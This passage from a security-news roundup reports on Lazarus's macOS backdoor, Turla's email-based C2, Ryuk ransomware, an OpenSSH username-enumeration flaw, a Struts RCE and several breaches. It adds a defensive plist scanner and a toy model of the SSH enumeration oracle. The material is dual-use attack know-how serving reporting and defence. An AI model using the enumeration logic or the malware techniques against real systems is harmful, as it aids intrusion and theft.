The Fallchill backdoor is a piece of malware formerly attributed to the Lazarus group that contains “enough functions to fully control the infected host,” Kaspersky points out. The malware operators appear to be reusing code and C&C infrastructure over and over again, the security firm also notes.

“Lazarus group has entered a new platform: macOS. […] We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once,” Kaspersky says.

What is yet unclear, however, is whether Lazarus was able to compromise Celas and abuse its update mechanism to deliver malware, or if the hackers managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism,” thus creating a fake supply chain.

Google Blocks Accounts in 'Influence Operation' Linked to Iran
24.8.2018 securityweek BigBrothers

Google said Thursday it blocked YouTube channels and other accounts over a misinformation campaign linked to Iran, on the heels of similar moves by Facebook and Twitter.

Google said that working with the cybersecurity firm FireEye, it linked the accounts to the Islamic Republic of Iran Broadcasting as part of an effort dating to at least January 2017.

"We identified and terminated a number of accounts linked to the IRIB organization that disguised their connection to this effort," Google vice president Kent Walker said in a statement.

"Actors engaged in this type of influence operation violate our policies, and we swiftly remove such content from our services and terminate these actors' accounts."

Google became the latest online service to crack down on misinformation efforts stemming from Russia and Iran, with the apparent aim of sowing discord and confusion ahead of the November US elections.

The tech giant said it blocked 39 YouTube channels that had racked up a total of 13,466 views in the US on "relevant videos" and disabled six accounts at Blogger and 13 accounts at its Google+ social network.

"In addition to the intelligence we received from FireEye, our teams have investigated a broader range of suspicious actors linked to Iran who have engaged in this effort," Google said.

Phishing season

Google also said it has blocked state-sponsored phishing attacks in which deceptive messages were sent to users of its free email service in an effort to trick people into disclosing information such as passwords.

"In recent months, we've detected and blocked attempts by state-sponsored actors in various countries to target political campaigns, journalists, activists, and academics located around the world," Google said.

The California-based internet giant added that in the past year it has intensified defenses against "actors linked to" the Russia-backed Internet Research Agency (IRA).

Google has removed YouTube channels and a Blogger account as a result of monitoring IRA activities, according to the company. A FireEye report released on Thursday detailed its findings and expressed confidence in attributing influence campaigns to Iran.

Evidence included phone numbers, website registration information, and promotion of content in sync with Iranian political interests, according to the report.

"The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media driven influence operations as a means of shaping political discourse," FireEye said.

"These operations extend well beyond those conducted by Russia."

Coordinated manipulation

Facebook this week revealed that it removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing."

The accounts, some on Facebook-owned Instagram, were presented as independent news or civil society groups but were actually working in coordinated efforts, the company said.

The social network giant said some of the pages were tied to groups previously linked to Russian intelligence operations.

Separately, Twitter said it suspended 284 accounts "for engaging in coordinated manipulation," adding that "it appears many of these accounts originated from Iran."

Former Facebook security chief Alex Stamos said in a blog post Wednesday that gaping holes remain in online platforms.

Stamos, who left Facebook this month to join Stanford University, said that "the United States has broadcast to the world that it doesn't take these issues seriously...While this failure has left the US unprepared to protect the 2018 elections, there is still a chance to defend American democracy in 2020."

Microsoft last week seized websites it linked to Russian intelligence that sought to meddle in US political debate.

Australia Bans Huawei From 5G Network Over Security Concerns
24.8.2018 securityweek BigBrothers

CANBERRA, Australia (AP) — Chinese-owned telecommunications giant Huawei has been blocked from rolling out Australia's 5G network due to security concerns.

The government said Thursday that the involvement of a company "likely to be subject to extrajudicial directions from a foreign government" presented too much risk.

Several governments have been scrutinizing Huawei over its links to the Chinese government. The private Chinese company started by a former People's Liberation Army major in 1987 suffered a setback in the U.S. market in 2012 when a congressional report said it was a security risk and warned phone companies not to buy its equipment.

Huawei has said it would never hand over Australian customer data to Chinese spy agencies, but the government's statement said no combination of security controls sufficiently mitigated the risk.

Acting Home Affairs Minister Scott Morrison said the government was committed to protecting 5G networks.

The decision also affects ZTE Corp, a Chinese maker of mobile devices.

Shenzhen-based Huawei, the world's largest telecommunications equipment supplier, had been banned from bidding for contracts for Australia's broadband network in 2011.

5G networks will start commercial services in Australia next year.

Huawei Australia tweeted that the decision was "extremely disappointing." Huawei Australia Chairman John Lord had said in June that rejecting one of the world's leading 5G suppliers could impact Australia's economic growth and productivity for generations.

In Beijing, Foreign Ministry spokesman Lu Kang expressed "serious concerns" about the decision and accused the Australian government of "making up excuses to create hurdles deliberately and taking discriminative measures in this regard.

"We urge the Australian government to discard ideological biases and create a level playing field for Chinese companies' operations in Australia," Lu told reporters at a daily briefing.

The U.S. House Intelligence Committee previously found that Huawei and ZTE, which is partly state-owned, were tied to the Chinese government and that both companies failed to provide responsive and detailed answers about those relationships and about their U.S. operations.

Huawei denied being financed to undertake research and development for the Chinese military, but the committee said it had received internal Huawei documents showing the company provided special network services to an entity alleged to be an elite cyber-warfare unit within the People's Liberation Army.

Lord, of Huawei Australia, at the time urged Australia not to be swayed by the U.S. report, which he said was about protectionism rather than security.

Intel Simplifies Microcode Update License Following Complaints
24.8.2018 securityweek Hacking

Intel has made significant changes to the license for its latest CPU microcode updates after users complained that the previous version banned benchmarks and comparison tests.

Since January, when researchers disclosed the existence of the speculative execution vulnerabilities known as Spectre and Meltdown, Intel has released several rounds of microcode updates designed to prevent these and similar attacks.

The latest updates are designed to address three vulnerabilities tracked as Foreshadow or L1 Terminal Fault (L1TF). Microsoft and Linux distributions have begun distributing the microcode updates for these flaws, but some people noticed that the license file delivered with the updates prohibits benchmarking.

“Unless expressly permitted under the Agreement, You will not, and will not allow any third party to [...] publish or provide any Software benchmark or comparison test results,” the license read.

The mitigations for speculative execution vulnerabilities have been known to have a significant impact on performance in some cases. In the case of the Foreshadow flaws, Intel and Microsoft said there should not be any performance degradation on consumer PCs and many data center workloads. However, some data center workloads may be slowed down.

Someone at Intel apparently attempted to prevent users from making public the results of performance impact testing for the latest mitigations, but people quickly noticed.

“Lots of people are interested in the speed penalty incurred in the microcode fixes, and Intel has now attempted to gag anyone who would collect information for reporting about those penalties, through a restriction in their license,” Bruce Perens, one of the founders of the open source movement, wrote in a blog post.

“Bad move. The correct way to handle security problems is to own up to the damage, publish mitigations, and make it possible for your customers to get along. Hiding how they are damaged is unacceptable. Silencing free speech by those who would merely publish benchmarks? Bad business. Customers can’t trust your components when you do that,” he added.

Lucas Holt, project lead at MidnightBSD, noted on Twitter, “Performance is so bad on the latest spectre patch that intel had to prohibit publishing benchmarks.”

Following complaints, Intel has decided to significantly simplify the license. It now only says that redistributions of the microcode updates must include a copyright notice and a disclaimer, Intel’s name cannot be used to endorse or support products derived from its software, and that reverse engineering or disassembly of its software are not permitted.

“We have simplified the Intel license to make it easier to distribute CPU microcode updates,” said Imad Sousou, corporate VP and GM of Intel’s Open Source Technology Center. “As an active member of the open source community, we continue to welcome all feedback and thank the community.”

Oath Pays Over $1 Million in Bug Bounties
24.8.2018 securityweek Security

As part of its unified bug bounty program, online publishing giant Oath has paid over $1 million in rewards for verified bugs, the company announced this week.

In April, Oath paid more than $400,000 in bug bounties during a one-day HackerOne event in San Francisco, where 40 white hat hackers were invited to find bugs in the company’s portfolio of brands and online services, including Tumblr, Yahoo, Verizon Digital Media Services and AOL.

The event also represented an opportunity for the company to formally introduce its unified bug bounty program, which brought together the programs that were previously divided across AOL, Yahoo, Tumblr and Verizon Digital Media Services (VDMS).

Only two months later, the program had already surpassed $1 million in payouts for verified bugs, the media and tech company says.

“This scale represents a significant decrease in risk and a considerable reduction of our attack surface. Every bug found and closed is a bug that cannot be exploited by our adversaries,” Oath CISO Chris Nims now says.

Nims also points out that, following the feedback received from participants, the company also made a series of changes to their program policy. The company is now willing to hand out rewards for more types of vulnerabilities, although SQLi, RCE and XXE/XMLi flaws are still a priority.

Oath also published the payout table to increase the transparency of the program.

Additionally, the media giant has added EdgeCast to the bug bounty program, by opening the VDMS-EdgeCast-Partners and VDMS-EdgeCast-Customers private programs, which were previously operated separately, to the unified program.

Oath also plans on defining a structured scope for the suite of brands included in the unified bug bounty program. The purpose of this is to “help separate and define bugs for different assets.”

“The security landscape changes constantly, and we hope these updates to the bug bounty program will keep both Paranoids and security researchers alike more adept to detect threats before they cause damage to our community,” Nims concludes.

Half a Million Cards Exposed in Cheddar's Scratch Kitchen Breach
24.8.2018 securityweek Incident

Over half a million payment card numbers were exposed after cybercriminals compromised the point-of-sale system of certain Cheddar's Scratch Kitchen restaurants, Darden Restaurants announced.

Previously known as Cheddar's Casual Café and based in Irving, Texas, Cheddar's Scratch Kitchen was founded in 1979 and had more than 163 locations in 23 states as of 2016. Darden acquired the concept in 2017.

In a notice published this week, Darden revealed that it learned of the data breach on August 16, 2018, from federal authorities. The compromised system, the company says, was a legacy point-of-sale system used in certain restaurant locations.

The incident might have impacted the payment card information of guests who visited the affected Cheddar's restaurants between Nov. 3, 2017 and Jan. 2, 2018. A total of 567,000 payment card numbers are believed to have been compromised.

The data breach impacted Cheddar's restaurants located in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia and Wisconsin.

The company says that it has engaged a third-party forensic cybersecurity firm to investigate the incident and that its current systems and networks were not impacted. The legacy system that was compromised “was permanently disabled and replaced by April 10, 2018, as part of our integration process,” the company says.

Cheddar's isn’t the only restaurant chain to have suffered a payment card breach this year. Malware at Chili’s restaurants collected customer card information in March and April, Brinker, which operates over 1,600 Chili’s and Maggiano’s restaurants, revealed in May.

In March, RMH Franchise Holdings revealed that over 160 Applebee’s restaurants were impacted by point-of-sale (PoS) malware that could collect names, credit or debit card numbers, expiration dates, and card verification codes.

North Korea-linked Lazarus APT uses first Mac malware in cryptocurrency exchange attack
24.8.2018 securityaffairs APT

The North Korea-linked Lazarus APT group has for the first time used a macOS variant of the Fallchill malware, in an attack on a cryptocurrency exchange.
According to Kaspersky, the North Korea-linked Lazarus group used macOS malware to target a cryptocurrency exchange in a recent attack.

The Lazarus Group’s activity surged in 2014 and 2015. Its members mostly used custom-tailored malware in their attacks, and the experts who have investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it has been involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers discovered that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Pictures hack.

Recently the APT has targeted cryptocurrency exchanges and cryptocurrency companies. Experts from Kaspersky Lab tracked a new campaign, dubbed Operation AppleJeus, aimed at spreading a tainted cryptocurrency trading application.

“While investigating a cryptocurrency exchange attacked by Lazarus, we made an unexpected discovery. The victim had been infected with the help of a trojanized cryptocurrency trading application, which had been recommended to the company over email.” states the report published by Kaspersky.

“It turned out that an unsuspecting employee of the company had willingly downloaded a third-party application from a legitimate looking website and their computer had been infected with malware known as Fallchill, an old tool that Lazarus has recently switched back to.”


The novelty of this attack is that, for the first time, the attackers used a version of the Fallchill malware specifically developed to target macOS systems in addition to Windows.

This development matters for the group’s strategy: it shows Lazarus expanding its list of potential targets.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” continues Kaspersky.

The malware was not inserted into the installation package; instead, it was delivered to the target machine in the form of an update.

The experts discovered that the APT used a legitimate-looking application called Celas Trade Pro, which comes from Celas Limited.

At the end of the installation process, the software runs the Updater.exe module that gathers system information and sends it back to the server in the form of a GIF image.

The malware continuously connects to the command and control (C&C) server to fetch and execute an additional executable file.

If the server responds with HTTP code 200, the updater extracts a base64-encoded payload and decrypts it using RC4 with another hardcoded key to retrieve an executable file.

For macOS users, Celas LLC also provided a native version of its trading app. Experts noticed that a hidden ‘autoupdater’ module is installed in the background, starting immediately after installation and again after every system reboot.

At the time of the report, it was not clear whether Lazarus compromised Celas’ server in a classic supply chain attack or managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism.”

Once the Celas Trade Pro app is installed on macOS, it launches the Updater application at system startup via a file named “.com.celastradepro.plist.”

Because the file name starts with a dot, it is hidden from the Finder and from a default Terminal directory listing.

The “Updater” file is passed the “CheckUpdate” parameter on start and quits if no argument is passed.

The updater is implemented using the cross-platform Qt framework. Once executed, it creates a unique identifier for the infected host, collects system information, and sends it to the attacker’s server in encrypted form.
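The persistence trick described above (a dot-prefixed launchd plist that starts an “Updater” with a “CheckUpdate” argument) is something a defender can hunt for. The following is an added example, not Kaspersky’s code: it walks LaunchAgents/LaunchDaemons folders, which are standard launchd locations assumed here since the report does not name the directory, and flags hidden plists or ones passing that argument. The sample plists are constructed in a temporary directory so the check runs offline.

```python
"""Flag launchd property lists resembling the AppleJeus persistence: a hidden
(dot-prefixed) .plist in a LaunchAgents/LaunchDaemons folder whose program is
passed a 'CheckUpdate' argument.

Added example, not Kaspersky's code. Directory names and plist keys follow
standard launchd conventions; the sample files are constructed below.
"""
import os
import plistlib
import tempfile

LAUNCHD_DIRS = ("LaunchAgents", "LaunchDaemons")  # under ~/Library or /Library
SUSPICIOUS_ARGS = {"CheckUpdate"}  # argument the report says the Updater requires


def inspect_plist(path: str) -> dict:
    """Return findings for one plist: hidden name, run-at-load, suspicious args."""
    findings = {"path": path, "hidden": os.path.basename(path).startswith("."),
                "run_at_load": False, "suspicious_args": [], "program": None}
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)
    except Exception:
        return findings  # unreadable or malformed: still report the hidden name
    args = data.get("ProgramArguments") or []
    findings["program"] = data.get("Program") or (args[0] if args else None)
    findings["run_at_load"] = bool(data.get("RunAtLoad"))
    findings["suspicious_args"] = [a for a in args[1:] if a in SUSPICIOUS_ARGS]
    return findings


def scan_launchd_dirs(library_root: str) -> list:
    """Walk <library_root>/LaunchAgents and LaunchDaemons and return entries that
    are hidden (dot-prefixed) or carry a suspicious argument. os.listdir shows
    dotfiles, unlike the Finder or a default 'ls'."""
    hits = []
    for sub in LAUNCHD_DIRS:
        d = os.path.join(library_root, sub)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            f = inspect_plist(os.path.join(d, name))
            if f["hidden"] or f["suspicious_args"]:
                hits.append(f)
    return hits


def build_sample_library() -> str:
    """Create a constructed ~/Library look-alike with one benign agent and one
    AppleJeus-style hidden agent; returns its path."""
    root = tempfile.mkdtemp(prefix="lib_")
    agents = os.path.join(root, "LaunchAgents")
    os.makedirs(agents)
    benign = {"Label": "com.example.sync", "RunAtLoad": True,
              "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync"]}
    # File name and argument follow the report; the program path is a placeholder.
    hidden = {"Label": "com.celastradepro", "RunAtLoad": True,
              "ProgramArguments": ["/PLACEHOLDER/CelasTradePro.app/Contents/MacOS/Updater",
                                   "CheckUpdate"]}
    with open(os.path.join(agents, "com.example.sync.plist"), "wb") as fh:
        plistlib.dump(benign, fh)
    with open(os.path.join(agents, ".com.celastradepro.plist"), "wb") as fh:
        plistlib.dump(hidden, fh)
    return root


if __name__ == "__main__":
    for hit in scan_launchd_dirs(build_sample_library()):
        print(hit)
```

On a real Mac, point scan_launchd_dirs at ~/Library and /Library instead of the constructed sample.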

“First of all, Lazarus group has entered a new platform: macOS. There is steadily growing interest in macOS from ordinary users, especially in IT companies. Many developers and engineers are switching to using macOS. Apparently, in the chase after advanced users, software developers from supply chains and some high profile targets, threat actors are forced to have macOS malware tools.” concludes Kaspersky.

“We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once.”

Latest Turla backdoor leverages email PDF attachments as C&C mechanism
24.8.2018 securityaffairs APT

Malware researchers from ESET have published a detailed report on the latest variant of the Turla backdoor that leverages email PDF attachments as C&C.
Malware researchers from ESET have conducted a new analysis of a backdoor used by the Russia-linked APT Turla in targeted espionage operations.

The new analysis revealed a list of high-profile victims that was previously unknown.

Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (the Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using

The new analysis conducted by ESET revealed that the hackers breached Germany’s Federal Foreign Office: Turla infected several computers and used the backdoor to siphon data for almost the whole of 2017.

The cyberspies first compromised the network of the country’s Federal College of Public Administration, then broke into the network of the Foreign Office in March 2017. The hack was discovered by German authorities at the end of the year and publicly disclosed in March 2018. ESET explained that the most important aspect of the new analysis is the discovery of a covert access channel used by Turla to hit the foreign offices of another two European countries.

“Importantly, our own investigation has determined that, beyond this much-publicized security breach, the group has leveraged the same backdoor to open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.” reads the analysis published by ESET.

“These organizations are the latest known additions to the list of victims of this APT group that has been targeting governments, state officials, diplomats, and military authorities since at least 2008.”

The Turla backdoor has been used since at least 2009 and has been continuously improved over the years. The most recent samples appear very sophisticated and implement a rare degree of stealth and resilience. The last analyzed variant dates back to April 2018 and implements the ability to execute malicious PowerShell scripts directly in computer memory.


The malware analyzed by ESET does not use a classic command and control server; instead, it receives updates and instructions via PDF files delivered by email.

“Rather than using a conventional command-and-control (C&C) infrastructure, such as one based on HTTP(S), the backdoor is operated via email messages; more specifically, through specially crafted PDF files in email attachments.” continues the analysis.

“The compromised machine can be instructed to carry out a range of commands. Most importantly, these include data exfiltration, as well as the downloading of additional files and the execution of additional programs and commands. Data exfiltration itself also takes place via PDF files.”

Information is exfiltrated by generating a PDF containing the siphoned data, which is then sent out via email messages and their metadata.

“From the PDF documents, the backdoor is able to recover what attackers call a container in the logs. This is a binary blob with a special format that contains encrypted commands for the backdoor,” reads the report released by ESET.

“Technically, the attachment does not have to be a valid PDF document. The only requirement is that it includes a container in the right format.”

The Turla backdoor deletes the messages sent to or received from the attacker to remain stealthy.

The backdoor is a standalone DLL (dynamic link library) that interacts with the Outlook and The Bat! email clients, and it gains persistence through COM object hijacking. With this trick, the malicious DLL is loaded each time Outlook loads the hijacked COM object.

Unlike other backdoors, the Turla sample subverts Microsoft Outlook’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes and avoid being detected.

The backdoor implements several commands; ESET’s report includes the full list.

ESET experts did not detect any PDF sample including the commands for the backdoor, but they were able to create such a document.

The full list of Indicators Of Compromise (IoCs) and samples can be found on GitHub.

Expert found a flaw that affects all OpenSSH versions since 1999
24.8.2018 securityaffairs

A security expert discovered a username enumeration vulnerability in the OpenSSH client that affects all versions of the software released since 1999.
Security expert Darek Tytko has discovered a username enumeration vulnerability in the OpenSSH client. The flaw, tracked as CVE-2018-15473, affects all versions of the software released since 1999. The vulnerability could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

OpenSSH maintainers have now released a security fix, but since the OpenSSH client is included in a broad range of software applications, many of them could remain vulnerable for a long time.

Researchers from Qualys published a detailed analysis of the vulnerability once they noticed that the bug had been fixed.

The flaw could potentially impact billions of devices running the vulnerable software.

Let’s see in detail how attackers can trigger the flaw.

The attacker tries to authenticate on an OpenSSH endpoint using a malformed authentication request (i.e. a truncated packet).

A vulnerable OpenSSH server, in turn, would respond in two different ways.

If the username included in the malformed authentication request does not exist, the server responds with an authentication failure message; otherwise, the server closes the connection without a reply.

“The attacker can try to authenticate a user with a malformed packet (for example, a truncated packet), and:

if the user is invalid (it does not exist), then userauth_pubkey() returns immediately, and the server sends an SSH2_MSG_USERAUTH_FAILURE to the attacker;
if the user is valid (it exists), then sshpkt_get_u8() fails, and the server calls fatal() and closes its connection to the attacker.” states the advisory.
“We believe that this issue warrants a CVE; it affects all operating systems, all OpenSSH versions (we went back as far as OpenSSH 2.3.0, released in November 2000), and is easier to exploit than previous OpenSSH username enumerations (which were all timing attacks).”

The flaw could allow an attacker to guess valid usernames registered on an SSH server and then launch brute-force attacks to guess their passwords.
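Why the fix works is easiest to see in miniature. The block below is an added example, not OpenSSH code: it models the two code paths the Qualys advisory describes (an early return for an unknown user, a fatal() on a truncated packet for a known user) and the patched ordering, which parses the whole request before consulting the user database so that a malformed packet produces the same observable result for every username. The packet layout is a simplified stand-in for the publickey userauth fields; KNOWN_USERS is a constructed account list.

```python
"""Toy model of the CVE-2018-15473 response oracle and the patched behaviour.

Added example, not OpenSSH code. The handlers imitate the two code paths the
Qualys advisory describes and the fix that parses the full request first.
"""
import struct

# Constructed user database standing in for the server's account list.
KNOWN_USERS = {"alice", "backup"}

# Outcomes exactly as a remote peer would observe them.
USERAUTH_FAILURE = "SSH2_MSG_USERAUTH_FAILURE"
DISCONNECT = "connection closed (fatal)"


class Truncated(Exception):
    """Packet ended before a field could be read (an sshpkt_get_* failure)."""


def get_string(buf: bytes, pos: int):
    """Read an SSH 'string' (uint32 length + bytes); raise Truncated if short."""
    if pos + 4 > len(buf):
        raise Truncated
    (n,) = struct.unpack(">I", buf[pos:pos + 4])
    if pos + 4 + n > len(buf):
        raise Truncated
    return buf[pos + 4:pos + 4 + n], pos + 4 + n


def get_u8(buf: bytes, pos: int):
    """Read one byte (the 'have signature' flag); raise Truncated if absent."""
    if pos + 1 > len(buf):
        raise Truncated
    return buf[pos], pos + 1


def build_request(user: str, truncate: bool) -> bytes:
    """Simplified publickey request: user string, then have-sig byte and
    algorithm string. truncate=True drops everything after the username,
    which is the malformed packet the advisory talks about."""
    u = user.encode()
    pkt = struct.pack(">I", len(u)) + u
    if not truncate:
        pkt += b"\x00" + struct.pack(">I", 7) + b"ssh-rsa"
    return pkt


def vulnerable_userauth_pubkey(pkt: bytes) -> str:
    """Pre-fix ordering: bail out for an unknown user BEFORE parsing the rest."""
    user, pos = get_string(pkt, 0)
    if user.decode(errors="replace") not in KNOWN_USERS:
        return USERAUTH_FAILURE      # returns immediately, nothing else parsed
    try:
        get_u8(pkt, pos)             # known user: keep parsing, fails if truncated
    except Truncated:
        return DISCONNECT            # fatal(): server drops the connection
    return USERAUTH_FAILURE          # well-formed request, key not accepted


def fixed_userauth_pubkey(pkt: bytes) -> str:
    """Post-fix ordering: parse the entire request first, then check the user,
    so a malformed packet is fatal regardless of whether the user exists."""
    try:
        user, pos = get_string(pkt, 0)
        _have_sig, pos = get_u8(pkt, pos)
        _alg, pos = get_string(pkt, pos)
    except Truncated:
        return DISCONNECT
    # Both known and unknown users now reach the same reply for a valid packet.
    return USERAUTH_FAILURE


def leaks_user_existence(handler) -> bool:
    """True if a truncated request yields different observable outcomes for a
    known and an unknown user, i.e. the handler is an enumeration oracle."""
    known = handler(build_request("alice", truncate=True))
    unknown = handler(build_request("nobody", truncate=True))
    return known != unknown
```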

OpenSSH versions 1:6.7p1-1 and 1:7.7p1-1, and the 1:7.7p1-4 unstable branch, have addressed the flaw.

Proof-of-concept code for the vulnerability is already available online.
The security researcher Didier Stevens of NVISO Labs also published a detailed analysis of the flaw that includes instructions for testing servers against it.

T-Mobile data breach exposed personal information of up to 2 million customers
24.8.2018 securityaffairs Incident

T-Mobile today announced it has suffered a security breach that may have exposed the personal information of up to 2 million T-Mobile customers.
According to the telco giant, the incident affected its US servers on August 20; the leaked information includes customers’ names, billing zip codes, phone numbers, email addresses, account numbers, and account types (prepaid or postpaid).
T-Mobile notified affected customers of the security breach via SMS message, a letter in the mail, or a phone call.
“Our cyber-security team discovered and shut down an unauthorized access to certain information, including yours, and we promptly reported it to authorities. None of your financial data (including credit card information) or social security numbers were involved, and no passwords were compromised” reads the announcement published on the company’s website.
“However, you should know that some of your personal information may have been exposed, which may have included one or more of the following: name, billing zip code, phone number, email address, account number and account type (prepaid or postpaid).”
The company ruled out that the security breach exposed financial data such as credit card numbers.

In a blog post, T-Mobile explained how its staff detected and locked out the intruders on Monday, August 20.

At the time, T-Mobile did not share details of the hack and did not provide information on the extent of the incident.

A spokesperson for T-Mobile told Motherboard that the incident affected less than 3 percent of its 77 million customers.
The spokesperson added that the attack was carried out by hackers belonging to “an international group.”
The attackers managed to access T-Mobile servers through an API. The good news is that the API was not designed to provide access to financial data or other sensitive information.
“We found it quickly and shut it down very fast,” the spokesperson added.
T-Mobile reported the incident to law enforcement.

“We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,” T-Mobile said. “We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you.”

The company is urging customers to contact its customer service through 611 for any information regarding the security breach.

Attack on DNC Part of Simulated Phishing Test
23.8.2018 securityaffairs Attack

A recent phishing attack aimed at the Democratic National Committee’s voter database was actually part of a simulation, researchers and representatives of the Democratic Party confirmed.

Cybersecurity firm Lookout this week came across a custom phishing website apparently aimed at the Democratic National Committee (DNC), specifically its VoteBuilder service.

The phishing site mimicked a login page of NGP VAN, a technology provider for the Democratic Party, and was hosted by DigitalOcean.

Lookout immediately notified the DNC, NGP VAN and DigitalOcean, and the phishing page was removed within hours, before any credentials were compromised. The FBI was also informed and an investigation was launched.

However, after further analysis, the DNC now believes the fake website was actually created by a third-party as part of a “simulated phishing test on VoteBuilder.”

“The test, which mimicked several attributes of actual attacks on the Democratic party's voter file, was not authorized by the DNC, VoteBuilder nor any of our vendors,” explained Bob Lord, the DNC’s chief security officer.

“There are constant attempts to hack the DNC and our Democratic infrastructure, and while we are extremely relieved that this wasn't an attempted intrusion by a foreign adversary, this incident is further proof that we need to continue to be vigilant in light of potential attacks,” Lord added.

Mike Murray, who leads Lookout’s intelligence team, confirmed that it was a false alarm.

“The thing about ‘false alarms’ is that you don’t know that they’re false until you’ve showed up to investigate,” Murray said on Twitter. “All the folks who pulled together on this were amazing, and had this been a real attack, would have stopped something terrible.”

According to PCMag tech reporter Michael Kan, the phishing test was actually commissioned by the Michigan Democratic Party, but without authorization from the DNC.

SecurityWeek has reached out to the Michigan Democratic Party for comment and will update this article if the organization responds.

“I would [...] not call this a TEST as the phishing attempt was being conducted on a live production system against real people,” Joseph Carson, chief security scientist at Thycotic, told SecurityWeek. “The positive side is that newer technology is helping organizations identify such threats earlier however, this did raise a major issue to attribution and the source of the hacks because as we know, many cyberattacks utilize third party vendors,”

“I would actually handle this incident as an attempted cyberattack since the DNC has confirmed it was not authorized or approved so therefore a full incident and digital forensics process should be carried out even though it was a so-called test,” Carson said.

Critical Apache Struts 2 Flaw Allows Remote Code Execution
23.8.2018 securityweek

Updates released on Wednesday for the Apache Struts 2 open source development framework address a critical vulnerability that can be exploited for remote code execution.

The flaw, tracked as CVE-2018-11776, affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Patches are included in Struts 2.3.35 and 2.5.17. A temporary workaround has also been made available, but Struts developers have described it as “weak” and advised users to install the updates as soon as possible.

“It is possible to perform a RCE attack when namespace value isn't set for a result defined in underlying xml configurations and in same time, its upper action(s) configurations have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set and in same time, its upper action(s) configurations have no or wildcard namespace,” Struts developers wrote in an advisory.

The vulnerability was discovered by a researcher from Semmle, a code analysis company that announced its global launch this week, along with $21 million in funding.

Semmle has published a blog post containing technical details on the vulnerability. According to the company, the issue was reported to the Apache Struts Security Team on April 10 and code patches were released on June 25.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers. On top of that, the weakness is related to the Struts OGNL language, which hackers are very familiar with, and are known to have been exploited in the past,” said Man Yue Mo, the Semmle researcher who discovered CVE-2018-11776.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Semmle has made public only limited details in an effort to prevent malicious exploitation. The company last year discovered another Apache Struts vulnerability that ended up being exploited in the wild. However, the new flaw is even more severe, Man Yue Mo said.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.

Organizations Hit With North Korea-Linked Ryuk Ransomware
23.8.2018 securityweek

A recent wave of ransomware attacks against organizations around the world has been linked to a notorious North Korean threat actor, security firm Check Point says.

The campaign appears highly targeted, with at least three organizations in the United States and worldwide severely affected. Because some victims decided to pay large ransoms in order to retrieve access to their files, the campaign operators are estimated to have netted over $640,000 to date.

Two versions of the ransom note were sent to victims: a longer, well-worded one that demanded a payment of 50 Bitcoin (around $320,000), and a shorter, more blunt note demanding payments between 15 and 35 BTC (up to $224,000).

Dubbed Ryuk, the ransomware used in these attacks appears connected to Hermes, a piece of file-encrypting malware previously associated with the North Korean threat group Lazarus. Hermes too was used in targeted attacks, including the attack against the Far Eastern International Bank (FEIB) in Taiwan.

Thus, Check Point’s security researchers concluded that Lazarus could be responsible for the Ryuk ransomware as well, unless another actor was able to get Hermes’ source code and used it to build their own malware.

As Intezer and McAfee revealed not long ago, however, most North Korean malware can be linked to Lazarus via code reuse.

Ryuk’s encryption scheme, the researchers note, was built specifically for small-scale operations. Thus, not only is the infection carried out manually by the operators, but the malware itself infects only crucial assets and resources on the targeted networks.

The ransomware’s encryption logic resembles that found in Hermes, and the code used to generate, place and verify a marker to determine if a file was already encrypted is identical in both malware families. The function that invokes this routine conducts very similar actions in both cases.

Furthermore, both ransomware families drop files to disk that resemble each other in name and purpose, and Check Point notes that such similarity of code “might well be a sign of an underlying identical source code.”

As part of the recent attacks, a dropper containing both the 32-bit and 64-bit modules of the ransomware was used. When run, Ryuk checks if it was executed with a specific argument and then kills more than 40 processes and over 180 services belonging to antivirus, database, backup and document editing software.

The ransomware also achieves persistence on the infected machines and attempts to encrypt network resources in addition to local drives. It also destroys its encryption key and deletes shadow copies and various backup files from the disk to prevent users from recovering files.

The researchers also note that, from the exploitation phase through to the encryption process and the ransom demand itself, the Ryuk campaign is clearly targeted at organizations that can pay large ransom amounts.

